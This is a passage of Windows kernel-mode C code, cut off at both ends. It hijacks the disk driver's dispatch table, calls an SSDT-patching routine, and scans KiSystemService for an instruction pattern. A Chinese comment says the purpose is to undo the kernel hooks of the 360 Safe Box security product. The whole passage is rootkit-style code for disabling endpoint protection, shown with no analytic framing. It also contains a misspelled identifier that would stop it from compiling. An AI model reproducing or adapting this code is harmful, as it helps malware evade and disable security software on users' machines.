NSITIVE, *IoDriverObjectType, 0, 0, &protectdrv) ) { if ( protectdrv ) { if ( !ObReferenceObjectByName(&aDriverDisk, 64, 0, OBJ_CASE_INSENSITIVE, *IoDriverObjectType, 0, 0, &diskdrv) ) { if ( diskdrv ) { if ( diskdrv->MajorFunction[IRP_MJ_CREATE] == diskdrv->MajorFunction[IRP_MJ_CLOSE ] ) { mjcreate = (ULONG)diskdrv->MajorFunction[IRP_MJ_CREATE]; i=0; while(i<=IRP_MJ_MAXIMUM_FUNCTION) diskdrv->MajorFunction[i++]=(PDRIVER_DISPATCH)mjcreate; } } } } }
PatchSSDT(); systemservice=(ULONG)ZwAccessCheckAndAuditAlarm+13+*(ULONG*)((ULONG)ZwAccessCheckAndAudITAlarm+13)+4; DbgPrint("KiSystemService - %x",systemservice); count=0; foundaddr=0; while(count<0x300) {
if(*(unsigned char*)(systemservice+count)==0x8B&& *(unsigned char*)(systemservice+count+1)==0x1C&& *(unsigned char*)(systemservice+count+2)==0x87) { foundaddr=systemservice+count+3; break; } count++; } //还原360保险箱对KiSystemService的钩子 /* 804d5e77 8b1c87 mov ebx,dword ptr [edi+eax*4] 804d5e7a 2be1 sub esp,ecx 804d5e7c c1e902 shr ecx,2 804d5e7f 8bfc mov edi,esp 804d5e81 3b35b4745480 cmp esi,dword ptr [nt!MmUserProbeAddress (805474b4)] */
if(foundaddr){